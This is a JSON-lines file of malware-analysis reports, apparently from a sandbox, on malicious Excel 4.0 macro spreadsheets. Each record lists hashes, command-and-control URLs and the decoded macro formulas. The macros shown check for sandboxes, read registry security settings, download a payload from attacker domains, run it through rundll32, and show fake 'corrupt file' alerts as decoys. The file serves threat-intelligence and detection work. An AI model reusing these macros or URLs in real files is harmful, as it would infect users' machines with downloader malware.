{"version":"0.2","sample":{"sample":"","kind":"file","target":"15a9401a329edb202384c166b4898495d380248a72cd762ed3b9ef7dd6024751"},"analysis":{"reported":"2020-04-09T16:15:02Z","score":10},"files":[{"filename":"15a9401a329edb202384c166b4898495d380248a72cd762ed3b9ef7dd6024751","filesize":185344,"md5":"5149b83694d72fdc0cbde56eb30224e7","sha1":"b3166436320980330835d92aece150e9774e7ebf","sha256":"15a9401a329edb202384c166b4898495d380248a72cd762ed3b9ef7dd6024751","sha512":"3c67ad9fb1351cc975bbadc714107f54594681a7f5a9c36ae2f8a2c0076ed7cdf1c2da8bcbb9b6c3420dbffa80507f042cc59a542273c32c76ab109dfe7f5712","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"15a9401a329edb202384c166b4898495d380248a72cd762ed3b9ef7dd6024751.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://doolised.xyz/DSBVhsdv78f"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"15aa1e51c5b139aa971390c5a2d353f2a41ad8d8b5064b64f7148fb764f6012c"},"analysis":{"reported":"2020-04-09T16:15:02Z","score":10},"files":[{"filename":"15aa1e51c5b139aa971390c5a2d353f2a41ad8d8b5064b64f7148fb764f6012c","filesize":144384,"md5":"7017122db9baae8a9e74ef28374cf4cb","sha1":"bd38ba9fb770c07bd77ea9f94d7eaa98728e00e6","sha256":"15aa1e51c5b139aa971390c5a2d353f2a41ad8d8b5064b64f7148fb764f6012c","sha512":"35ffffaecd9e9de8f4fc85c022111ee1f2d3e7de45db09e999ef1c0078b709cecef83bc1c98229a6b12af8b6486f0cc86c660f3d71b0dd9574afc9c249b08142","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"15aa1e51c5b139aa971390c5a2d353f2a41ad8d8b5064b64f7148fb764f6012c.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://tdvomds.pw/12341324rfefv"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"WORKBOOK.HIDE(\"ykEWN4lv9Y\",TRUE)\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$23C$7\u003c770,CLOSE(FALSE),)\nIF(R$24C$7\u003c381,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nRETURN()\nGOTO(R$53C$14)\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"15aeb4913b3886e569d0527baa3264b3ac78e9484176c4a53c0bbc9163f0f16c"},"analysis":{"reported":"2020-04-09T16:15:02Z","score":10},"files":[{"filename":"15aeb4913b3886e569d0527baa3264b3ac78e9484176c4a53c0bbc9163f0f16c","filesize":219136,"md5":"a854b14cc6f3e32ca727128edce4b10b","sha1":"7fa7ccc8a39c362cdbb0c2aaf84dd9e401170995","sha256":"15aeb4913b3886e569d0527baa3264b3ac78e9484176c4a53c0bbc9163f0f16c","sha512":"89d6aec56d543129a79f10228f23f774bba7fa3235acb960394c210f3aa580384c9535846ff6c036e27836e16047d7180743f5e24d8ede723331fe4770700753","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"15aeb4913b3886e569d0527baa3264b3ac78e9484176c4a53c0bbc9163f0f16c.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["http://kacper-formela.pl/wp-smart.php","http://braeswoodfarmersmarket.com/wp-smart.php"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-4]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://kacper-formela.pl/wp-smart.php\",\"c:\\Users\\Public\\bqg85ef.html\",0,0)\n=IF(R[-1]C\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://braeswoodfarmersmarket.com/wp-smart.php\",\"c:\\Users\\Public\\bqg85ef.html\",0,0),)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bqg85ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"g3uLURSIWI\",TRUE)\nGOTO(R$1C$17)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"15b162fc8a6c8f1c021b5b92791c2fe4076948f6b060e41f025feb5ee99a25fd"},"analysis":{"reported":"2020-04-09T16:15:02Z","score":10},"files":[{"filename":"15b162fc8a6c8f1c021b5b92791c2fe4076948f6b060e41f025feb5ee99a25fd","filesize":209920,"md5":"c86ce6eb5eb331fd524792be354772a1","sha1":"be4493eac460c4764ba0283bc7b02c5ad4996f22","sha256":"15b162fc8a6c8f1c021b5b92791c2fe4076948f6b060e41f025feb5ee99a25fd","sha512":"c4c14eaf3de637b8e0d2c1a9d311e82a77935dfde4315f07ee954ef6b331b3e84a996c1b63c1febd5f8a001515a7f045547d3ef1af0dcfd032f17161265595a1","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"15b162fc8a6c8f1c021b5b92791c2fe4076948f6b060e41f025feb5ee99a25fd.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["http://fcowhcwsb.space/erg4ewr1"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://fcowhcwsb.space/erg4ewr1\",\"c:\\Users\\Public\\b7gf5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\b7gf5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"xWOwIibbUA\",TRUE)\nGOTO(R$0C$16)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"15c1f8b577ff5343284dda96b7b78d13c14793c1f903124c7a97d85cd22b657f"},"analysis":{"reported":"2020-04-09T16:15:02Z","score":10},"files":[{"filename":"15c1f8b577ff5343284dda96b7b78d13c14793c1f903124c7a97d85cd22b657f","filesize":167936,"md5":"506a4d5262bb3a7f893997fa9ad239e1","sha1":"ca1bc979bd69fd29db11a576ee2cd96e71006406","sha256":"15c1f8b577ff5343284dda96b7b78d13c14793c1f903124c7a97d85cd22b657f","sha512":"8ed2a95af1a91a3f5accc15e593b8808e46e4558c3c92a8c371b96fbaab14437580abb7e18c19bcb2677a88c2e802f2bc1b7ce6c5a1ed1b672604ebf26b29ae7","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"15c1f8b577ff5343284dda96b7b78d13c14793c1f903124c7a97d85cd22b657f.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\gef3fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"vSuhZ3x7ZO\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"15c37aa93a34cd83ff83f9299e459f9a6707598a470fa936bd6442e7c4d9135f"},"analysis":{"reported":"2020-04-09T16:15:02Z","score":10},"files":[{"filename":"15c37aa93a34cd83ff83f9299e459f9a6707598a470fa936bd6442e7c4d9135f","filesize":160768,"md5":"72952e44f6a6a446be71ff4e484c404a","sha1":"1c7194ca56c569868cd1205958eb5e7d67e523fd","sha256":"15c37aa93a34cd83ff83f9299e459f9a6707598a470fa936bd6442e7c4d9135f","sha512":"5a759f3f8dfd6b1b3bed73e7f81e5f8b030ecadd23e66bf4407a62cecda1b2d3baa7be1cc15d4cbca0ed4b5b96fd36360be6e9c56daffc70b59d941088b1c3d8","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"15c37aa93a34cd83ff83f9299e459f9a6707598a470fa936bd6442e7c4d9135f.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://cdncloudtech.xyz/deg34g","https://waitupdate.xyz/deg34g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://cdncloudtech.xyz/deg34g\",\"c:\\Users\\Public\\cmgp5ef.html\",0,0)\n=IF(R[-1]C\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://waitupdate.xyz/deg34g\",\"c:\\Users\\Public\\cmgp5ef.html\",0,0),)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\cmgp5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"6zpBh5JFTV\",TRUE)\nGOTO(R$0C$11)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"15c8372944ba6816ddfa1a9723dea50988acdd375c8ab8c4139661d98022a9b0"},"analysis":{"reported":"2020-04-09T16:15:02Z","score":10},"files":[{"filename":"15c8372944ba6816ddfa1a9723dea50988acdd375c8ab8c4139661d98022a9b0","filesize":142848,"md5":"4fdae65785dc5d3a4a0025215a49871b","sha1":"e3270e84d16f426d280c11050de7f298ccb7771d","sha256":"15c8372944ba6816ddfa1a9723dea50988acdd375c8ab8c4139661d98022a9b0","sha512":"6d72ad7303241d2ac7d6a6331dd71a1c52cb26f1b67e55afa73bd393a1785a538424097cadcd992cec502d2eb9bfbb2830970802580579d21e750aae12c4d208","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"15c8372944ba6816ddfa1a9723dea50988acdd375c8ab8c4139661d98022a9b0.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://pjtcdnrd.pw/fsgbfgbfsg43"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"WORKBOOK.HIDE(\"Y7I3fX2Y4I\",TRUE)\nRETURN()\nRETURN()\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$20C$11\u003c770,CLOSE(FALSE),)\nIF(R$21C$11\u003c380,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"15da3c21cc9ba50c548b169ab65bbf63784c9e4e469429f49c8e9582e693f639"},"analysis":{"reported":"2020-04-09T16:15:02Z","score":10},"files":[{"filename":"15da3c21cc9ba50c548b169ab65bbf63784c9e4e469429f49c8e9582e693f639","filesize":167936,"md5":"ab0d92a348fe6d252e7536b4ddfbf9f4","sha1":"97e455d621337bb074b893433a42b12a4dcd649f","sha256":"15da3c21cc9ba50c548b169ab65bbf63784c9e4e469429f49c8e9582e693f639","sha512":"b288f9751d0b7beb55c57fb80ebf402940cf690f3b7c3c986eec800ae7879a88b7489cb79403c64c7be4bbda990f2fe5d07d6e74004afe7171b9b096d3e1326b","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"15da3c21cc9ba50c548b169ab65bbf63784c9e4e469429f49c8e9582e693f639.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\gef3fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"xHTPCN4W55\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"15f559990dfed4968ea3ba6d01180edd4c50a4eb5c04c4d8ed776c28156795ab"},"analysis":{"reported":"2020-04-09T16:15:02Z","score":10},"files":[{"filename":"15f559990dfed4968ea3ba6d01180edd4c50a4eb5c04c4d8ed776c28156795ab","filesize":144384,"md5":"e002631bff5d606d4ffcbabb1962f875","sha1":"acb31082fbe1256884ed08352490a4f6ad09392b","sha256":"15f559990dfed4968ea3ba6d01180edd4c50a4eb5c04c4d8ed776c28156795ab","sha512":"1a9965ba7418123ded9f5a1f264ca604c3438b7fc91de270e7a83932f622d23d2da731e1c052a286ca28104d4019510181c9ac8a47697a8ff543e5f761869ce2","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"15f559990dfed4968ea3ba6d01180edd4c50a4eb5c04c4d8ed776c28156795ab.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://tdvomds.pw/12341324rfefv"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"WORKBOOK.HIDE(\"IR4sFoeXz6\",TRUE)\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$23C$7\u003c770,CLOSE(FALSE),)\nIF(R$24C$7\u003c381,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nRETURN()\nGOTO(R$53C$14)\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"15f9e77664ad6c24738171e437731fa73f9c844b0d4fb773b48537279aead07f"},"analysis":{"reported":"2020-04-09T16:15:02Z","score":10},"files":[{"filename":"15f9e77664ad6c24738171e437731fa73f9c844b0d4fb773b48537279aead07f","filesize":113664,"md5":"9c74fa516e330b191b89953737b29de6","sha1":"e99e4f7f69a238400124791723dd6f9d0a893b2c","sha256":"15f9e77664ad6c24738171e437731fa73f9c844b0d4fb773b48537279aead07f","sha512":"394cbe175ce16d83c0917e9adcdec47b572d471675742880f347db1828893d073915f0cc17a339eb047460c7640c42f851a3c229a79a0bde687e4c1f88b6a467","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"15f9e77664ad6c24738171e437731fa73f9c844b0d4fb773b48537279aead07f.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://fbknuele.pw/aagaeg4df12"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://fbknuele.pw/aagaeg4df12\",\"c:\\Users\\Public\\bwep5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bwep5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"DWfGQzQCGn\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"15fb865ed27472f47691c4e7c2482671299432e2e8aaa15560c889544aa11a4c"},"analysis":{"reported":"2020-04-09T16:15:02Z","score":10},"files":[{"filename":"15fb865ed27472f47691c4e7c2482671299432e2e8aaa15560c889544aa11a4c","filesize":167424,"md5":"f19f00d1c1e4254764a300e31c330009","sha1":"8e7486e39d0badb697c669600c517676869cf7f8","sha256":"15fb865ed27472f47691c4e7c2482671299432e2e8aaa15560c889544aa11a4c","sha512":"dd8e026d666145728d03696fc8dbb00637640d6e50a4daa6ffa34059a78c96384721f8cd22befc0d54704a2aba86e4d42555b62cdacaa79fd1c4c9e8ff30814d","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"15fb865ed27472f47691c4e7c2482671299432e2e8aaa15560c889544aa11a4c.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://tdvomds.pw/fgwg24g24g"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"WORKBOOK.HIDE(\"oW2SOOtx1Y\",TRUE)\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$18C$2\u003c770,CLOSE(FALSE),)\nIF(R$19C$2\u003c381,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nRETURN()\nGOTO(R$39C$10)\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"161bff81aef7479ecc847dab8c49c175d3c0cd84df4c5896e60d45e0147859a6"},"analysis":{"reported":"2020-04-09T16:15:03Z","score":10},"files":[{"filename":"161bff81aef7479ecc847dab8c49c175d3c0cd84df4c5896e60d45e0147859a6","filesize":209920,"md5":"4f642a42f2871138c7fc3aae6beaf0e0","sha1":"3d2f62742842dafc7bb88d0f493a54953c9cc488","sha256":"161bff81aef7479ecc847dab8c49c175d3c0cd84df4c5896e60d45e0147859a6","sha512":"7ddf4b8c2e60885cdd9c8283d9cdbf283f73380ef159932342ea77e3392421a4e6d76c8d11ed923df659cbaf03f5f21b90cddd7d4e0abcd66ad9c640c47cc2f4","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"161bff81aef7479ecc847dab8c49c175d3c0cd84df4c5896e60d45e0147859a6.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["http://fcowhcwsb.space/erg4ewr1"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://fcowhcwsb.space/erg4ewr1\",\"c:\\Users\\Public\\b7gf5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\b7gf5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"QcJEh1Gkdx\",TRUE)\nGOTO(R$0C$16)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"165f13846e6a54223f1137e28086508ea4fcf2d79f8ec8a307c411f18f7c2aa1"},"analysis":{"reported":"2020-04-09T16:15:03Z","score":10},"files":[{"filename":"165f13846e6a54223f1137e28086508ea4fcf2d79f8ec8a307c411f18f7c2aa1","filesize":167936,"md5":"fb60ca402f864458c9a22796bef5f654","sha1":"8bc808b0d888eeb9381a28186a3cd107df8ec19f","sha256":"165f13846e6a54223f1137e28086508ea4fcf2d79f8ec8a307c411f18f7c2aa1","sha512":"44b3d62c687b0c8d339870d02e05791ea4e7130fd726a49f3e8290d05b9c873ae62e9f66bb65850fc0bc78441517fa3aa2586dd0a6ba484c5c14a892a3872cf2","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"165f13846e6a54223f1137e28086508ea4fcf2d79f8ec8a307c411f18f7c2aa1.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\gef3fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"lSnVZ9FuX2\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"1665c25543dd4c225d169563afcc26ea5a5c8f358f64cb114c802eda4210fbde"},"analysis":{"reported":"2020-04-09T16:15:03Z","score":10},"files":[{"filename":"1665c25543dd4c225d169563afcc26ea5a5c8f358f64cb114c802eda4210fbde","filesize":116224,"md5":"fc52702fe488d35360f07d4e58520e0a","sha1":"8741f7693b4bf9f2e8146103a4eda61c7d7c366d","sha256":"1665c25543dd4c225d169563afcc26ea5a5c8f358f64cb114c802eda4210fbde","sha512":"03c74e60a05fdfb8443759d363e888f63af2f762e96f40505e2f2ec90c3e94238a45c96a3a62667ef5513b816f8c23f94b6af96afba9639cab415f5fa64ff873","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"1665c25543dd4c225d169563afcc26ea5a5c8f358f64cb114c802eda4210fbde.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://pxdgcvnsb.xyz/aaeg4df12"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://pxdgcvnsb.xyz/aaeg4df12\",\"c:\\Users\\Public\\cwep5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\cwep5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"jFvwI6AuuY\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"166c52347b5a0e46edfddddeaf72a92a2177b9df2a4223802cfbb6abcf53b90e"},"analysis":{"reported":"2020-04-09T16:15:03Z","score":10},"files":[{"filename":"166c52347b5a0e46edfddddeaf72a92a2177b9df2a4223802cfbb6abcf53b90e","filesize":116224,"md5":"4ba4460f56a461fb36df56e2a0651aa1","sha1":"426165afd91b28d92f569dbbd1aa4cb2072d67d1","sha256":"166c52347b5a0e46edfddddeaf72a92a2177b9df2a4223802cfbb6abcf53b90e","sha512":"b7b0fbb732b88efb6dcc1c943ed6464e48f80de6c07213d51647c867d47a087c029a008d4967088dff8a5746583b9839248988f21abfc85776475a57d0eb1e7f","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"166c52347b5a0e46edfddddeaf72a92a2177b9df2a4223802cfbb6abcf53b90e.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://pxdgcvnsb.xyz/aaeg4df12"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://pxdgcvnsb.xyz/aaeg4df12\",\"c:\\Users\\Public\\cwep5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\cwep5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"Q1fswU0IO6\",TRUE)\nGOTO(R$1C$10)"}}}]}
